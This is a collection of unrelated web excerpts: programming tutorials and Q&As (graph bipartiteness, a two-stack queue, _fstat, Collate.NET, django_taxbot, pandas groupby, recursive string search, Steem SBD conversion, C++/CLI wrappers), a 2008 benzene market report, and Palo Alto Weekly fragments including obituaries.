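            u = queue.popleft()
            for v in adj[u]:
                if colour[v] is None:
                    colour[v] = 1 - colour[u]
                    queue.append(v)
                elif colour[v] == colour[u]:  # odd cycle found
                    return False
    return True

# The tutorial's sample input: 8 nodes, 6 edges
edges = [(1, 6), (6, 3), (3, 8), (5, 2), (2, 7), (7, 4)]
print(is_bipartite(8, edges))  # True
```

A triangle (1-2, 2-3, 3-1) is the smallest graph on which this returns False, since it is an odd-length cycle.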
https://www.tutorialcup.com/interview/graph/bipartite-graph.htm
20 November 2008 09:43 [Source: ICIS news] SINGAPORE (ICIS news)--Asia's benzene values fell below the $300/tonne mark, levels not seen since February 2002, on the back of lower crude values and weak market fundamentals, traders and producers said on Thursday. A deal was heard concluded at $290/tonne FOB (free on board). Weak demand from key downstream styrene monomer (SM) and phenol segments in the past months had weighed down on benzene, traders and producers said. Prices have fallen by a hefty $695-705/tonne or 70-71% since 3 October 2008, according to global chemical market intelligence service ICIS pricing. "Demand is very bad, and there is no place for benzene to go," said a Korean trader, referring to the poor derivatives market situation and the closed arbitrage window for exports. The downtrend in crude values, which touched $52/bbl on Thursday, added pressure on benzene.
http://www.icis.com/Articles/2008/11/20/9173082/asia-benzene-hits-6-yr-low-at-below-300t.html
A stack is implemented as LIFO: insertion and deletion are done at the same end, the top. The last element that entered is deleted first. Stack operations are push and pop. A queue is implemented as FIFO: insertions are done at one end (the rear) and deletions are done at the other end (the front). The first element that entered is deleted first. Queue operations are enqueue and dequeue. This is a C++ program to implement a queue using two stacks. #include<stdlib.h> #include<iostream> using namespace std; struct nod//node declaration { int d; struct nod *n; }; void push(struct nod** top_ref, int n_d);//function prototypes int pop(struct nod** top_ref); struct queue { struct nod *s1; struct nod *s2; }; void enQueue(struct queue *q, int m) { push(&q->s1, m); } int deQueue(struct queue *q) { int m; if (q->s1 == NULL && q->s2 == NULL) { cout << "Queue is empty"; exit(0); } if (q->s2 == NULL) { while (q->s1 != NULL) { m = pop(&q->s1); push(&q->s2, m); } } m = pop(&q->s2); return m; } void push(struct nod** top_ref, int n_d) { struct nod* new_node = (struct nod*) malloc(sizeof(struct nod)); if (new_node == NULL) { cout << "Stack overflow \n"; exit(0); } //put item on stack new_node->d= n_d; new_node->n= (*top_ref); (*top_ref) = new_node; } int pop(struct nod** top_ref) { int res; struct nod *top; if (*top_ref == NULL)//if stack is empty { cout << "Stack underflow \n"; exit(0); } else { //pop element from stack top = *top_ref; res = top->d; *top_ref = top->n; free(top); return res; } } int main() { struct queue *q = (struct queue*) malloc(sizeof(struct queue)); q->s1 = NULL; q->s2 = NULL; cout << "Enqueuing..7"; cout << endl; enQueue(q, 7); cout << "Enqueuing..6"; cout << endl; enQueue(q, 6); cout << "Enqueuing..2"; cout << endl; enQueue(q, 2); cout << "Enqueuing..3"; cout << endl; enQueue(q, 3); cout << "Dequeuing..."; cout << deQueue(q) << " "; cout << endl; cout << "Dequeuing..."; cout << deQueue(q) << " "; cout << endl; cout << "Dequeuing..."; cout << deQueue(q) << " "; cout << 
endl; } Enqueuing..7 Enqueuing..6 Enqueuing..2 Enqueuing..3 Dequeuing...7 Dequeuing...6 Dequeuing...2
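For comparison, here is the same two-stack queue sketched in Python, with plain lists standing in for the linked-list stacks of the C++ version:

```python
# Elements are pushed onto `inbox`; when a dequeue finds `outbox` empty,
# everything is moved across once, reversing the order into FIFO.
class TwoStackQueue:
    def __init__(self):
        self.inbox, self.outbox = [], []

    def enqueue(self, item):
        self.inbox.append(item)

    def dequeue(self):
        if not self.outbox:            # refill only when outbox is empty
            while self.inbox:
                self.outbox.append(self.inbox.pop())
        if not self.outbox:
            raise IndexError("queue is empty")
        return self.outbox.pop()

q = TwoStackQueue()
for x in (7, 6, 2, 3):
    q.enqueue(x)
print(q.dequeue(), q.dequeue(), q.dequeue())  # 7 6 2
```

Because each element is moved between the two stacks at most once, a sequence of n operations costs O(n) overall (amortized O(1) per operation).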
https://www.tutorialspoint.com/cplusplus-program-to-implement-queue-using-two-stacks
Get information about an open file. int _fstat( int fd, struct _stat *buffer ); int _fstat64( int fd, struct __stat64 *buffer ); int _fstati64( int fd, struct _stati64 *buffer ); Return 0 if the file-status information is obtained. A return value of –1 indicates an error, in which case errno is set to EBADF, indicating an invalid file descriptor. The _fstat function obtains information about the open file associated with fd and stores it in the structure pointed to by buffer. The _stat structure, defined in SYS\STAT.H, contains the file-status fields. For additional compatibility information, see Compatibility in the Introduction. Libraries All versions of the C run-time libraries. // crt_fstat.c /* This program uses _fstat64 to report * the size of a file named F_STAT.OUT. */ #include <io.h> #include <fcntl.h> #include <time.h> #include <sys/types.h> #include <sys/stat.h> #include <stdio.h> #include <stdlib.h> #include <string.h> int main( void ) { struct __stat64 buf; int fd, result; char buffer[] = "A line to output"; if( (fd = _open( "f_stat.out", _O_CREAT | _O_WRONLY | _O_TRUNC )) != -1 ) _write( fd, buffer, strlen( buffer ) ); /* Get data associated with "fd": */ result = _fstat64( fd, &buf ); /* Check if statistics are valid: */ if( result != 0 ) printf( "Bad file descriptor\n" ); else { printf( "File size : %ld\n", buf.st_size ); printf( "Time modified : %s", _ctime64( &buf.st_ctime ) ); } _close( fd ); } File size : 16 Time modified : Wed Feb 13 09:00:01 2002 File Handling Routines | _access | _chmod | _filelength | _stat | Run-Time Routines and .NET Framework Equivalents
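A portable analogue of the same pattern: Python's os.fstat also reports on an open file descriptor. This sketch writes the same 16-byte line to a temporary file (instead of a fixed F_STAT.OUT path) so it runs anywhere:

```python
# Open, write, then query the descriptor with fstat, mirroring the C sample.
import os
import tempfile
import time

fd, path = tempfile.mkstemp()
try:
    os.write(fd, b"A line to output")          # 16 bytes, as in the C sample
    info = os.fstat(fd)                        # stat_result: st_size, st_mtime, ...
    print("File size :", info.st_size)         # File size : 16
    print("Time modified :", time.ctime(info.st_mtime))
finally:
    os.close(fd)
    os.remove(path)
```

As with _fstat, the query works on the still-open descriptor, so no second open by path is needed.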
http://msdn.microsoft.com/en-us/library/221w8e43(VS.71).aspx
Collate.NET 1.3.2 See the version list below for details. NuGet\Install-Package Collate.NET -Version 1.3.2 dotnet add package Collate.NET --version 1.3.2 <PackageReference Include="Collate.NET" Version="1.3.2" /> paket add Collate.NET --version 1.3.2 #r "nuget: Collate.NET, 1.3.2" // Install Collate.NET as a Cake Addin #addin nuget:?package=Collate.NET&version=1.3.2 // Install Collate.NET as a Cake Tool #tool nuget:?package=Collate.NET&version=1.3.2 Collate.NET Usage Let's say you have an MVC controller which accepts requests from a grid control: using Collate.Implementation; public class UserController : Controller { public ActionResult GetItems(int pageNumber, int pageSize, string sortField, string sortDirection, string filterField, string filterValue) { var request = new PageAndFilterAndSortRequest { PageNumber = pageNumber, PageSize = pageSize, Sorts = new ISort[] { new Sort { Field = sortField, Direction = (sortDirection == "asc") ? SortDirection.Ascending : SortDirection.Descending } }, Filters = new IFilter[] { new Filter { Field = filterField, Operator = FilterOperator.Contains, Value = filterValue } } }; IList<User> data; using (var dbContext = new MyDataContext()) { data = dbContext.Users .Filter(request) .Sort(request) .Page(request) .ToList(); } return Json(data, JsonRequestBehavior.AllowGet); } } This way, all the control over what field(s) to filter and sort by is in the hands of the client, as well as controlling the page and page size of the data to be viewed, and yet all the filtering is done efficiently since Entity Framework will translate the IQueryable expression into a SQL query, and all the filtering, sorting and paging will be done in-database, and the response will be just the data that is needed to show the expected data in the grid. 
By implementing a few simple interfaces you can enable performant filtering and sorting in data-heavy applications without needing to re-architect your entire application. Please refer to the Tests project within the solution for more usage examples. .NETStandard 2.0 - No dependencies. NuGet packages This package is not used by any NuGet packages. GitHub repositories This package is not used by any popular GitHub repositories. Adds SourceLink support
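The filter-then-sort-then-page chain the package builds over IQueryable can be mimicked on plain sequences. This is a language-agnostic sketch of the idea, not Collate's actual API; all field and parameter names here are illustrative:

```python
# Apply a contains-filter, then sort, then take one page, in that order,
# mirroring the .Filter(request).Sort(request).Page(request) chain above.
def filter_sort_page(items, field, contains, sort_field, descending, page, page_size):
    out = [item for item in items if contains in item[field]]
    out.sort(key=lambda item: item[sort_field], reverse=descending)
    start = (page - 1) * page_size
    return out[start:start + page_size]

users = [{"name": "Alice"}, {"name": "Bob"}, {"name": "Mallory"}, {"name": "Carol"}]
print(filter_sort_page(users, "name", "o", "name", False, 1, 2))
# [{'name': 'Bob'}, {'name': 'Carol'}]
```

The important difference is where the work happens: here everything runs in memory, whereas Collate composes an expression tree that Entity Framework pushes down into SQL.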
https://www.nuget.org/packages/Collate.NET/1.3.2
django_taxbot 0.0.6 A simple Django app to figure out currencies in a limited number of countries. ============= Django Taxbot ============= This application attempts to make a little bit of sense out of the mess that is the tax landscape. It uses a saved (and regularly updated and expanding) dictionary of aggregated taxes to figure out payable taxes based on a set of passed in values. It bears noting that I have created this for my own use and while I intend to update it regularly, the accuracy of these values must be verified by the developer prior to use. While I wait for a suitable API for tax aggregates, I have compiled my own list and based this application on that list. Presently, this application only handles taxes in Canada, parts of the US, in Great Britain and in Nigeria. ----------- Quick Start ----------- 1. Install easily with pip: .. code :: python pip install django_taxbot 2. Add to your installed apps: .. code :: python INSTALLED_APPS = ( ... 'taxbot', ... ) 3. Import the TaxClient object in your projects and use as shown. ----------------- Detailed Overview ----------------- This section details the way the application can be used. To create a new ``TaxClient``, simply import and use like so: .. code :: python from taxbot import TaxClient client = TaxClient() And just like that, we now have a new TaxClient. This client is initialized as a Sales Tax client by default. To get Meal tax instead, pass in the ``M`` flag when initializing the client. .. code :: python client = TaxClient('M') Now we'll go over the methods available to the client. tax_known(self, country, [region, city]) ---------------------------------------- This method returns a Boolean value which informs us if the tax for the location is known or not. It is recommended that this method is called before any actions involving tax rates. Pass in as much information as possible to get the best results from this client. The method expects the country to be in ISO-ALPHA-2 codes. 
Region codes are 2-character alphas and cities can be spelled out. For countries with simple tax structures (Great Britain and Nigeria for now), the region and the city may be ignored. get_tax(self, country, [region, city]) -------------------------------------- Same as above, this method takes in 3 parameters. It calls on the ``tax_known`` method and so it is not necessary to call the former beforehand. This method returns the tax as a Decimal or, in instances where the tax structure is more complicated, returns a dictionary of applicable taxes. ** Important ** Please check the type of return values from this method before using them. calculate_tax(self, amount, country, [region, city]) ---------------------------------------------------- In addition to the parameters above, this method accepts the value on which the tax is to be calculated and returns a dictionary of all calculated taxes. create_tax(self, amount, country [region, city]) ------------------------------------------------ In addition to the above, this method will create a ``Tax`` (and a ``CanadianTax``) object where the tax is known. Please refer to the code base in the app repository to view the fields available on the respective objects. Cheers - Author: Seiyifa Tawari - Keywords: django tax rates
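The tax_known / get_tax / calculate_tax flow described above can be sketched in a few lines. The rates table below is entirely made up for illustration; it is not django_taxbot's real data or implementation:

```python
# (country, region) -> rate; a None region means a country-wide rate.
RATES = {("GB", None): 0.20, ("NG", None): 0.075, ("CA", "BC"): 0.12}

def tax_known(country, region=None):
    return (country, region) in RATES or (country, None) in RATES

def get_tax(country, region=None):
    # fall back to the country-wide rate when no regional rate exists
    return RATES.get((country, region), RATES.get((country, None)))

def calculate_tax(amount, country, region=None):
    return round(amount * get_tax(country, region), 2)

print(calculate_tax(100, "GB"))        # 20.0
print(calculate_tax(100, "CA", "BC"))  # 12.0
```

As the README recommends, a caller would check tax_known() first and only then ask for a rate, so a missing location fails early instead of mid-calculation.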
https://pypi.python.org/pypi/django_taxbot
I'm starting with input data like this Grouping is simple enough: g1 = df1.groupby( [ "Name", "City"] ).count() and printing yields a GroupBy object: City Name Name City Alice Seattle 1 1 Bob Seattle 2 2 Mallory Portland 2 2 Seattle 1 1 But what I want eventually is another DataFrame object that contains all the rows in the GroupBy object. In other words I want to get the following result: City Name Name City Alice Seattle 1 1 Bob Seattle 2 2 Mallory Portland 2 2 Mallory Seattle 1 1 I can't quite see how to accomplish this in the pandas documentation. Any hints would be welcome. g1 here is a DataFrame. It has a hierarchical index, though: In [19]: type(g1) Out[19]: pandas.core.frame.DataFrame In [20]: g1.index Out[20]: MultiIndex([('Alice', 'Seattle'), ('Bob', 'Seattle'), ('Mallory', 'Portland'), ('Mallory', 'Seattle')], dtype=object) Perhaps you want something like this? In [21]: g1.add_suffix('_Count').reset_index() Out[21]: Name City City_Count Name_Count 0 Alice Seattle 1 1 1 Bob Seattle 2 2 2 Mallory Portland 2 2 3 Mallory Seattle 1 1 Or something like: In [36]: DataFrame({'count' : df1.groupby( [ "Name", "City"] ).size()}).reset_index() Out[36]: Name City count 0 Alice Seattle 1 1 Bob Seattle 2 2 Mallory Portland 2 3 Mallory Seattle 1 I want to slightly change the answer given by Wes, because version 0.16.2 requires as_index=False. If you don't set it, you get an empty dataframe. Aggregation functions will not return the groups that you are aggregating over if they are named columns, when as_index=True, the default. The grouped columns will be the indices of the returned object. Passing as_index=Falsewill return the groups that you are aggregating over, if they are named columns. Aggregating functions are ones that reduce the dimension of the returned objects, for example: mean, sum, size, count, std, var, sem, describe, first, nth, min, max. This is what happens when you do for example DataFrame.sum()and get back a Series. 
nth can act as a reducer or a filter, see here. import pandas as pd df1 = pd.DataFrame({"Name":["Alice", "Bob", "Mallory", "Mallory", "Bob" , "Mallory"], "City":["Seattle","Seattle","Portland","Seattle","Seattle","Portland"]}) print df1 # # City Name #0 Seattle Alice #1 Seattle Bob #2 Portland Mallory #3 Seattle Mallory #4 Seattle Bob #5 Portland Mallory # g1 = df1.groupby(["Name", "City"], as_index=False).count() print g1 # # City Name #Name City #Alice Seattle 1 1 #Bob Seattle 2 2 #Mallory Portland 2 2 # Seattle 1 1 # EDIT: In version 0.17.1 and later you can use subset in count and reset_index with parameter name in size: print df1.groupby(["Name", "City"], as_index=False ).count() #IndexError: list index out of range print df1.groupby(["Name", "City"]).count() #Empty DataFrame #Columns: [] #Index: [(Alice, Seattle), (Bob, Seattle), (Mallory, Portland), (Mallory, Seattle)] print df1.groupby(["Name", "City"])[['Name','City']].count() # Name City #Name City #Alice Seattle 1 1 #Bob Seattle 2 2 #Mallory Portland 2 2 # Seattle 1 1 print df1.groupby(["Name", "City"]).size().reset_index(name='count') # Name City count #0 Alice Seattle 1 #1 Bob Seattle 2 #2 Mallory Portland 2 #3 Mallory Seattle 1 The difference between count and size is that size counts NaN values while count does not.
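The Name/City tallies the answers arrive at can be cross-checked with plain Python, without pandas:

```python
# Count (Name, City) pairs directly; this reproduces the groupby counts.
from collections import Counter

names = ["Alice", "Bob", "Mallory", "Mallory", "Bob", "Mallory"]
cities = ["Seattle", "Seattle", "Portland", "Seattle", "Seattle", "Portland"]
counts = Counter(zip(names, cities))

for (name, city), n in sorted(counts.items()):
    print(name, city, n)
# Alice Seattle 1
# Bob Seattle 2
# Mallory Portland 2
# Mallory Seattle 1
```

This is the same result as `df1.groupby(["Name", "City"]).size()`, just without the MultiIndex; the reset_index step in the answers is what flattens that index back into ordinary columns.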
https://pythonpedia.com/en/knowledge-base/10373660/converting-a-pandas-groupby-output-from-series-to-dataframe
I am really having a hard time getting recursions but i tried recursion to match a pattern inside a string. Suppose i have a string geeks for geeks and i have a pattern eks to match. I could use many methods out there like regex, find method of string class but i really want to do this thing by recursion. To achieve this i tried this code: void recursion(int i,string str) { if(!str.compare("eks")) cout<<"pattern at :"<<i<<'\n'; if(i<str.length() && str.length()-1!=0) recursion(i,str.substr(i,str.length()-1)); } int main() { string str("geeks for geeks"); for(int i=0;i<str.length();i++) recursion(i,str.substr(i,str.length())); } pattern at 2 pattern at 12 You will never get pattern at 2, since compare doesn't work like that. Ask yourself, what will std::string("eks for geeks").compare("eks") return? Well, according to the documentation, you will get something positive, since "eks for geeks" is longer than "eks". So your first step is to fix this: void recursion(int i, std::string str){ if(!str.substr(0,3).compare("eks")) { std::cout << "pattern at: " << i << '\n'; } Next, we have to recurse. But there's something off. i should be the current position of your "cursor". Therefore, you should advance it: i = i + 1; And if we reduce the length of the string in every iteration, we must not test i < str.length, otherwise we won't check the later half of the string: if(str.length() - 1 > 0) { recursion(i, str.substr(1)); } } Before we actually compile this code, let's reason about it: at every call we test whether the remaining string starts with "eks", then drop the first character and advance i, so every position of the original string gets checked. Seems reasonable: #include <iostream> #include <string> void recursion(int i, std::string str){ if(!str.substr(0,3).compare("eks")) { std::cout << "pattern at: " << i << '\n'; } i = i + 1; if(str.length() - 1 > 0) { recursion(i, str.substr(1)); } } int main () { recursion(0, "geeks for geeks"); return 0; } Output: pattern at: 2 pattern at: 12 However, that's not optimal. There are several optimizations that are possible. But that's left as an exercise. 
compare needs to use substr due to its algorithm. Write your own comparison function that doesn't need substr. The for loop was wrong. Why?
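The final answer's logic carries over to Python almost line for line, as a sketch: test a prefix at the current position, then recurse on the remainder with the index advanced.

```python
# Recursive pattern search: check the current prefix, then recurse on
# the string minus its first character, tracking the original index in i.
def find_pattern(text, pattern, i=0):
    hits = []
    if text.startswith(pattern):
        hits.append(i)
    if len(text) > 1:
        hits += find_pattern(text[1:], pattern, i + 1)
    return hits

print(find_pattern("geeks for geeks", "eks"))  # [2, 12]
```

As with the C++ version, copying the tail on every call makes this quadratic in the string length; it is a teaching sketch, not how you would search in production.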
https://codedump.io/share/niGobX9O91nT/1/searching-pattern-in-a-string
Steem Developer Portal PY: Convert Sbd To Steem How to convert your SBD to STEEM using Python. Full, runnable src of Convert Sbd To Steem can be downloaded as part of the PY tutorials repository. In this tutorial we will explain and show you how to convert some or all of your available SBD balance into STEEM on the Steem blockchain using the commit class found within the steem-python library. The Steem python library has a built-in function to transmit transactions to the blockchain. We are using the convert method found within the commit class in the library. Before we do the conversion, we check the current balance of the account to check how much SBD is available. This is not strictly necessary as the process will automatically abort with the corresponding error, but it does give some insight into the process as a whole. We use the get_account function to check for this. The convert method has 3 parameters: - amount - The amount of SBD that will be converted - account - The specified user account for the conversion - request-id - An identifier for tracking the conversion. This parameter is optional Steps - App setup - Library install and import. Connection to testnet - User information and steem node - Input user information and connection to Steem node - Check balance - Check current STEEM and SBD balance of user account - Conversion amount and commit - Input of SBD amount to convert and commit to blockchain 1. App setup In this tutorial we only use 1 package: steem- steem-python library and interaction with Blockchain We import the libraries and connect to the testnet. import steembase import steem conversion. Conversion amount and commit The final step before we can commit the transaction to the blockchain is to assign the amount parameter. We do this via a simple input from the terminal/console. 
#get recipient name convert_amount = input('Enter the amount of SBD to convert to STEEM: ') This value must be greater than zero in order for the transaction to execute without any errors. Now that we have all the parameters we can do the actual transmission of the transaction to the blockchain. #parameters: amount, account, request_id client.convert(float(convert_amount), username) print('\n' + convert_amount + ' SBD has been converted to STEEM') If no errors are encountered a simple confirmation is printed on the UI. As an added confirmation we check the balance of the user again and display it on the UI. This is not required at all but it serves as a more definitive confirmation that the conversion has been completed correctly. #get remaining account balance for STEEM and SBD userinfo = client.get_account(username) total_steem = userinfo['balance'] total_sbd = userinfo['sbd_balance'] print('\n' + 'REMAINING ACCOUNT BALANCE:' + '\n' + total_steem + '\n' + total_sbd) The STEEM balance will not yet have been updated as it takes 3.5 days to settle. The SBD will however show the new balance. We encourage users to play around with different values and data types to fully understand how this process works. You can also check the balances and transaction history on the testnet portal. To Run the tutorial - review dev requirements - clone this repo cd tutorials/32_convert_sbd_to_steem pip install -r requirements.txt python index.py - After a few moments, you should see a prompt for input in terminal screen.
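The tutorial reads the amount straight from input() and only notes that it "must be greater than zero". A small guard like the one below (a hypothetical helper, not part of steem-python or the tutorial's repo) makes that rule explicit before anything is committed to the blockchain:

```python
# Validate the user-entered conversion amount before calling client.convert.
def parse_convert_amount(text):
    try:
        amount = float(text)
    except ValueError:
        raise ValueError("amount must be a number")
    if amount <= 0:
        raise ValueError("amount must be greater than zero")
    return amount

print(parse_convert_amount("1.5"))  # 1.5
```

With this in place, a bad entry fails locally with a clear message instead of surfacing as a blockchain-side error after the transaction is transmitted.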
https://developers.steem.io/tutorials-python/convert_sbd_to_steem
Lead Software Engineer

It is a really helpful example. This is the exact match we were looking for. Thanks very much
http://www.roseindia.net/tutorialhelp/allcomments/4934
C++/CLI is a programming language created by Microsoft as a substitute for the older Managed Extensions for C++, which is now deprecated. As the name suggests, this language offers support for the .NET managed components in a C++ context. Many people are confused about why this language would be used instead of the much more widespread and powerful C#. The main reason is that C++/CLI allows you to use both managed and unmanaged code, offering you the opportunity to control the memory that is used by your program, instead of leaving all the decisions to the Garbage Collector. It should be noted that C++/CLI is not usually used by itself to develop software, but rather as a middleware between .NET and C++.

While there are many ways to write C++/CLI programs, in this article I will focus on a particular architecture that I generally use when developing this kind of application. The solution will contain 3 components: the core C++ project, the C++/CLI wrapper, and a C# project that will use the functionality of the core through the wrapper.

A well-known usage of this type of technology is represented by game engines that allow you to write scripts in C# – such as Unity3D or Xenko. Since game engines handle large quantities of data in a small amount of time, writing them in C# to begin with would not be a good idea regarding the performance of the engine. Thus, they are written in C++ and are made available to C# through a C++/CLI wrapper.

Preparations

In order to start working with the C++/CLI technology, it is necessary to install the module into Visual Studio. The first step is to open the Visual Studio Installer and press the "Modify" button. After that, expand the "Desktop development with C++" section on the right side of the window and select "C++/CLI support". Then press the "Modify" button again.
Creating the Core project

After the installation is done, open Visual Studio and create a new project. For its type, go to Visual C++ on the right menu and choose "Empty project". I usually name this project "Core", as it contains all the main functionality of the software; for the solution, you can choose any appropriate name.

Before we start writing the actual code, we have to change the configuration of the project. Right-click on the project in the Solution Explorer and select "Properties". Under "General", select "Static Library (.lib)" as the configuration type. This will convert the project from an executable to a library that we can include in other projects. Select "Apply" and "OK". This is all we have to do for now, so we can start writing code.

As I mentioned in the introduction, this type of project architecture is common with game engines; therefore, I will create an "Entity" class for this example that would represent a game object in such an engine. Right-click on the project and select "Add->New item->Header file" and name the file "Entity.h". Repeat for a C++ file named "Entity.cpp".

I chose to use a public field for the name as well as get-methods for the X and Y position so I can demonstrate how to use both of them in the wrapper. I have also added a void method that changes the position of the entity so that you can see how calling the method from the wrapper will have an effect upon the object from the core project.

As you can see, I have named the namespace "Core"; this may or may not be appropriate for your project. In this example (and in many other projects that I worked on), the purpose of the core project is only to contain the functionality that is going to be accessed by the wrapper. However, if you intend to use the C++ library that will be generated in other C++ projects, the name "Core" might become confusing. In that case, I suggest changing the name to something like "Unity3D-Core".
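The Entity listing itself did not survive in this copy of the article, so here is a sketch of what the description above implies; the exact member names and the choice of float coordinates are my assumptions, not the author's original code:

```cpp
#include <cstdio>
#include <string>

namespace Core {
    // Plain C++ game-object class for the Core static library.
    class Entity {
    public:
        std::string name;  // public field, accessed directly by the wrapper

        Entity(const char* entityName, float x, float y)
            : name(entityName), m_X(x), m_Y(y) {
            std::printf("Core::Entity '%s' created\n", name.c_str());
        }

        // Get-methods for the position, wrapped later as C# properties.
        float GetX() const { return m_X; }
        float GetY() const { return m_Y; }

        // Void method that changes the position of the entity.
        void Move(float dx, float dy) {
            m_X += dx;
            m_Y += dy;
            std::printf("Core::Entity '%s' moved to (%.1f, %.1f)\n",
                        name.c_str(), m_X, m_Y);
        }

    private:
        float m_X;
        float m_Y;
    };
}
```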
You will understand why these names become a problem when we start developing the wrapper.

As you can see, I also added some printing to the methods so you can clearly see the order of the operations when we execute the program. I have also tried to only include simple operations so that we can focus on the main point of the tutorial, which is accessing this code in a .NET context.

The last thing that I would like to do in this Core project is to create another header file, called "Core.h", which we will include in the files from the wrapper. This might seem unnecessary for a project of such small scale, but I highly suggest doing so for larger projects. The reason is that when trying to work with the Core library in other projects, it is easier to include the "Core.h" header file and just take what you need from there than to go through the process of learning the architecture of the project and thinking about which files you might need.

Creating the Wrapper project

Now that we are finished with the core code, we can move on to the wrapper project. Right-click the solution in the Solution Explorer, and select "Add->New project". Go to "Visual C++->CLR" in the left menu, and select "Class Library". I have called the project Wrapper in this case; other names you might use could have the form MyEngine-CLI.

Before we start writing the wrapper code, we need to add a reference to the Core project, so that we can use the Entity class that we created there. Right-click the Wrapper project in the Solution Explorer, choose "Add->Reference" and select the Core project. After that, right-click again on your project, go to Properties->C/C++->Precompiled Headers and change the first option to "Not Using Precompiled Headers".

Now that everything is set, we will begin with a class that you can use in all the C++/CLI projects that you will create in the future. I usually call this class ManagedObject. Let's add a new header file called ManagedObject.h to the wrapper project.
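The ManagedObject.h listing is missing from this copy of the article. The real header is C++/CLI (a public ref class declared with handle syntax), but stripped of the managed keywords, the idea described below reduces to this standard-C++ shape: a template that owns a pointer to the native instance and deletes it when the wrapper dies. Treat this as a sketch of the ownership pattern, not the actual managed code:

```cpp
// Standard-C++ sketch of the ManagedObject idea. The actual wrapper file
// declares this as a C++/CLI 'public ref class' with a destructor
// (~ManagedObject) and a finalizer (!ManagedObject); only the ownership
// pattern is shown here.
template <class T>
class ManagedObject {
public:
    explicit ManagedObject(T* instance) : m_Instance(instance) {}

    // Frees the unmanaged instance; in C++/CLI this work is split between
    // the destructor and the finalizer.
    ~ManagedObject() {
        delete m_Instance;
        m_Instance = nullptr;
    }

    T* GetInstance() const { return m_Instance; }

protected:
    T* m_Instance;  // pointer to the unmanaged Core object
};
```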
Note: In this example, I created a namespace called CLI for the Wrapper project; this avoids any confusion between the wrapper and the core. However, if you intend to have a more recognizable name for your wrapper namespace (such as the name of your project), it is important to follow the advice that I left in the previous note.

ManagedObject will act as a superclass for all the wrapper classes that we will create in this project. Its sole purpose is to hold a pointer to an unmanaged object from the Core project. You can also notice that the class contains a destructor (~ManagedObject) – which will be called whenever you delete an object with the delete keyword – and a finalizer (!ManagedObject), which is called by the Garbage Collector whenever it destroys the wrapper object. Notice also that I have defined the ManagedObject class as a template; you will see why when we create our first wrapper class.

Add an "Entity.h" file to the project, as well as an "Entity.cpp". As you can see, we include the "Core.h" file that we created in the Core project, so that we can access all the classes from there. Then we define the Entity wrapper class, which is a subclass of ManagedObject; you can now see why ManagedObject was a template: so that we can specify the unmanaged class for each of our wrapper classes.

When creating a wrapper class, the idea to follow is that you should declare all the members from the core class that you want to access from the .NET context. In this case, I created a constructor just like the one from the core Entity class – except that it takes a String for the name instead of a const char* – plus the Move method and, instead of the get-methods I created in the core project, 2 properties, just so you can see that you will be able to access them from C#.

Before moving further to the "Entity.cpp" file, I would like to add a function in "ManagedObject.h" that you will also use a lot in this type of project.
This function allows you to convert a .NET String to a const char* which you can further use in C++. If you want to do the conversion the other way around, things are not so complicated: the String class contains a constructor that accepts a const char* as a parameter.

Now, for the "Entity.cpp", we only have to define the constructor and the Move method. I have again added some console printing, but this time I used the .NET Console class to do so. Other than that, the only thing that has to be done in each method is to call its counterpart from the core project.

An important thing to notice about the data types is that all the primitive types from C++ are compatible with their C# counterparts and therefore need no conversion in order to pass them from one context to another. Apart from the .NET String to C++ const char* conversion, you might find yourself in the position where you need to convert a .NET array to a C++ one. Even though they might look the same, there is a big difference between them: a .NET array is an object, while a C++ array is simply a pointer to the first element. I did not include any arrays in this example, but I will give you an example of a function that does the conversion: I chose to create the example with an integer array, but you can replace int with any type that you need.

However, I recommend writing the code for this conversion wherever you need it rather than using a function like this, since, as you can see, there are two components that you need to know for the unmanaged array: the pointer to the first element and the number of elements. You can, of course, create a struct to hold both of these elements, but it is a simpler and more elegant solution to just write these two lines of code for each separate case where you need to.

Creating a C# sandbox project

The last part of this tutorial is to create a C# project and test whether we are able to access the C++ functionality or not.
Right-click the solution and add a new C# console application; I have called it Sandbox. After that, add a reference from the Sandbox project to the Wrapper, the same way you did earlier.

We are now ready to code a C# test; we can easily check the result by looking at the text that will be printed in the console. We are able to easily create a new Entity object – which is the Entity from the Wrapper project, not the one from the Core – and access the methods and properties that it has to offer. Before running the project, make sure to right-click on it in the Solution Explorer and choose "Set as startup project".

An interesting thing that you might notice in the console is that the core Entity object is created before the wrapper Entity object – this is actually an illusion created by the console printing, since the superclass constructor from the wrapper Entity object is called before the Console::WriteLine method is called.

Conclusion

The example that I developed for this article is very basic, as the main purpose of the article was to show you the architecture that is involved in a C++/CLI wrapper. If you wonder why you would ever use this technology for something as simple as accessing and changing two variables, the answer is that you should not. I mentioned game engines as a main candidate for using a wrapper several times in this article, because this is the example that I am most familiar with, but it is not the only acceptable case. However, you should spend some time taking all the possible solutions into consideration before deciding to use C++/CLI instead of just C#: Does it really increase the performance of your software? Is the Garbage Collector really hurting the memory usage of your program so much that you need to handle it yourself?
There are many such questions that may appear along the way, so I suggest researching the technologies that you are using in your project thoroughly before deciding to introduce a C++/CLI wrapper into it.
https://www.red-gate.com/simple-talk/dotnet/net-development/creating-ccli-wrapper/
10:00 a.m. This Sunday: Getting Lost on the One True Path
Prowler mistakes roof for a train
East Palo Alto chief named interim city manager

LET'S DISCUSS: Read the latest local news headlines and talk about the issues at Town Square at PaloAltoOnline

Support Palo Alto Weekly's print and online coverage of our community. Join today: SupportLocalJournalism.org/PaloAlto

Veronica Weber: Kelly McGonigal, a health psychologist and educator for the Stanford School of Medicine's Health Improvement Program, wrote "The Willpower Instinct," offering insights into what willpower is and how everyone can manage it. Page 12

"...control, the science points to one thing: the power of paying attention. Self-awareness, self-care, and remembering what matters most are the foundation for self-control." Freelance writer Kathy Cordova can be emailed at khcordova@gmail.com.

NOTICE OF PUBLIC MEETING of the City of Palo Alto Historic Resources Board [HRB], 8:00 A.M., Wednesday, March 7

In lieu of flowers, please send donations to Congregation Kol Emeth (kolemeth.org), Yiddish Book Center (yiddishbookcenter.org) or Hadassah (sharone-hadassah.org).

Robin Robinson
Nov. 18, 1931 - Dec. 25, 2011

Robin James Robinson, beloved by his family and many friends, died comfortably at home on December 25, 2011, at age 80 of prostate cancer. He is survived by his wife Carolyn Caddes; his step-daughter Jill Caddes of San Francisco; his stepson and daughter-in-law, Scott and Polly Washburn Caddes, their three children, Hayley, Jake, and Garrett, of Los Altos, California; and Robin's sister, Diane Bonem, of New Braunfels, Texas. Robin was born and grew up in Beaumont, Texas. He graduated from Rice University in 1954, and earned his PhD in Chemical Engineering from the University of Michigan.
